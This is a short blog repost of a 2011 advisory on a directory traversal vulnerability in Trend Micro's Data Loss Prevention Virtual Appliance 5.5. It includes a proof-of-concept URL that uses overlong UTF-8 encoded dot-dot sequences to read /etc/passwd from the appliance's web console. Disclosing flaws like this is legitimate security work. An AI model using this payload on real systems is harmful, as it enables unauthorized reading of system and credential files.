12 Jun 2011

Vulnerability: Directory Traversal

Software: Trend Micro Data Loss Prevention Virtual Appliance 5.5

Vulnerability: Directory Traversal

Threat Level: Serious (5/5)

Download: http://support.trendmicro.com.cn/TM- Product/Product/DLP/5.5/Manager/5.5_GM/DLPVA- 5.5.1294-i386-DVD.iso

Discovery Date: 27/05/2011

Remote: Yes

Author Site Email: Luis Martinez, Sergio Lopez,White Hat Consultores

http://whitehatconsultores.com/ Sergio López <sergio.sh at gmail.com> Luis Martínez <luismtzsilva at gmail.com>

Description:

A directory traversal vulnerability, can be exploited to read files outside of the web root.

PoC Exploit:

https://IP:8443/dsc//%c0%ae%c0%ae/%c0%ae%c0%ae/%c 0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%a e%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c 0%ae/%c0%ae%c0%ae/etc/passwd

PDF Advisory:

http://www.exploit-db.com/sploits/17388.pdf

|

Friends Blog

Sponsors : Best Google Covers | Desktop Wallpaperslk | PSD Graphics
Copyright © 2012. bedegar - All Rights Reserved
Template Design by Cool Blogger Tutorials | Published by Templates Doctor
Powered by Blogger